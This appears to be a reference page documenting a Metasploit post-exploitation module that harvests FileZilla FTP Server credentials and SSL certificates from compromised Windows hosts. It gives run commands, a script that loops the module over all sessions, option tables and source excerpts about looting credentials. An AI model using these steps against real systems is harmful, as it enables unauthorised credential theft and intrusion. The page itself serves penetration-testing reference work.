Windows Gather FileZilla FTP Server Credential Collection - Metasploit


This page contains detailed information about how to use the post/windows/gather/credentials/filezilla_server metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Windows Gather FileZilla FTP Server Credential Collection
Module: post/windows/gather/credentials/filezilla_server
Source code: modules/post/windows/gather/credentials/filezilla_server.rb
Disclosure date: -
Last modification time: 2021-10-06 13:43:31 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -

This module will collect credentials from the FileZilla FTP server if installed.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


There are two ways to execute this post module.

From the Meterpreter prompt

The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:

meterpreter > run post/windows/gather/credentials/filezilla_server

From the msf prompt

The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.

msf > use post/windows/gather/credentials/filezilla_server
msf post(filezilla_server) > show options
    ... show and set options ...
msf post(filezilla_server) > set SESSION session-id
msf post(filezilla_server) > exploit

If you wish to run the post against all sessions from framework, here is how:

1 - Create the following resource script:


framework.sessions.each_pair do |sid, session|
  run_single("use post/windows/gather/credentials/filezilla_server")
  run_single("set SESSION #{sid}")
  run_single("run")
end

2 - At the msf prompt, execute the above resource script:

msf > resource path-to-resource-script

Required Options


  • SESSION: The session to run this module on.

Go back to menu.

Msfconsole Usage


Here is how the windows/gather/credentials/filezilla_server post exploitation module looks in the msfconsole:

msf6 > use post/windows/gather/credentials/filezilla_server

msf6 post(windows/gather/credentials/filezilla_server) > show info

       Name: Windows Gather FileZilla FTP Server Credential Collection
     Module: post/windows/gather/credentials/filezilla_server
   Platform: Windows
       Arch: 
       Rank: Normal

Provided by:
  bannedit <[email protected]>
  g0tmi1k

Compatible session types:
  Meterpreter

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on.
  SSLCERT  false            no        Loot the SSL Certificate if its there?

Description:
  This module will collect credentials from the FileZilla FTP server 
  if installed.

Module Options


This is a complete list of options available in the windows/gather/credentials/filezilla_server post exploitation module:

msf6 post(windows/gather/credentials/filezilla_server) > show options

Module options (post/windows/gather/credentials/filezilla_server):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.
   SSLCERT  false            no        Loot the SSL Certificate if its there?

Advanced Options


Here is a complete list of advanced options supported by the windows/gather/credentials/filezilla_server post exploitation module:

msf6 post(windows/gather/credentials/filezilla_server) > show advanced

Module advanced options (post/windows/gather/credentials/filezilla_server):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Post Actions


This is a list of all post exploitation actions which the windows/gather/credentials/filezilla_server module can do:

msf6 post(windows/gather/credentials/filezilla_server) > show actions

Post actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the windows/gather/credentials/filezilla_server post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 post(windows/gather/credentials/filezilla_server) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Only meterpreter sessions are supported by this post module


Here is a relevant code snippet related to the "Only meterpreter sessions are supported by this post module" error message:

29:	    ])
30:	  end
31:	
32:	  def run
33:	    if session.type != "meterpreter"
34:	      print_error "Only meterpreter sessions are supported by this post module"
35:	      return
36:	    end
37:	
38:	    progfiles_env = session.sys.config.getenvs('ProgramFiles', 'ProgramFiles(x86)', 'ProgramW6432')
39:	    locations = []

Could not parse FileZilla Server Interface.xml


Here is a relevant code snippet related to the "Could not parse FileZilla Server Interface.xml" error message:

282:	      vprint_status("         IP: #{lastser['ip']}")
283:	      vprint_status("       Port: #{lastser['port']}")
284:	      vprint_status("   Password: #{lastser['password']}")
285:	      vprint_line
286:	    rescue
287:	      vprint_error("Could not parse FileZilla Server Interface.xml")
288:	    end
289:	    loot_path = store_loot("filezilla.server.creds", "text/csv", session, credentials.to_csv,
290:	                           "filezilla_server_credentials.csv", "FileZilla FTP Server Credentials")
291:	    print_status("Credentials saved in: #{loot_path}")
292:	

Invalid xml format


Here is a relevant code snippet related to the "Invalid xml format" error message:

314:	    passwords = 0
315:	
316:	    begin
317:	      doc = REXML::Document.new(data).root
318:	    rescue REXML::ParseException
319:	      print_error("Invalid xml format")
320:	    end
321:	
322:	    opt = doc.elements.to_a("Settings/Item")
323:	    if opt[1].nil? # Default value will only have a single line, for admin port - no adminstration settings
324:	      settings['admin_port'] = opt[0].text rescue "<none>"

Cannot loot the SSL Certificate, SSL is disabled in the configuration file


Here is a relevant code snippet related to the "Cannot loot the SSL Certificate, SSL is disabled in the configuration file" error message:

347:	    end
348:	    settings['ftp_bindip'] = "0.0.0.0" if settings['ftp_bindip'] == "*" || settings['ftp_bindip'].empty?
349:	
350:	    settings['ssl'] = settings['ssl'] == "1"
351:	    if !settings['ssl'] && datastore['SSLCERT']
352:	      print_error("Cannot loot the SSL Certificate, SSL is disabled in the configuration file")
353:	    end
354:	
355:	    settings['ssl_certfile'] = items[45].text rescue "<none>"
356:	    # Get the file if it is there. It could be useful in MITM attacks
357:	    if settings['ssl_certfile'] != "<none>" && settings['ssl'] and datastore['SSLCERT']

Invalid xml format


Here is a relevant code snippet related to the "Invalid xml format" error message:

434:	    lastser = {}
435:	
436:	    begin
437:	      doc = REXML::Document.new(data).root
438:	    rescue REXML::ParseException
439:	      print_error("Invalid xml format")
440:	      return lastser
441:	    end
442:	
443:	    opt = doc.elements.to_a("Settings/Item")
444:	

Go back to menu.


Go back to menu.

See Also


Check also the following modules related to this module:

Authors


  • bannedit
  • g0tmi1k

Version


This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.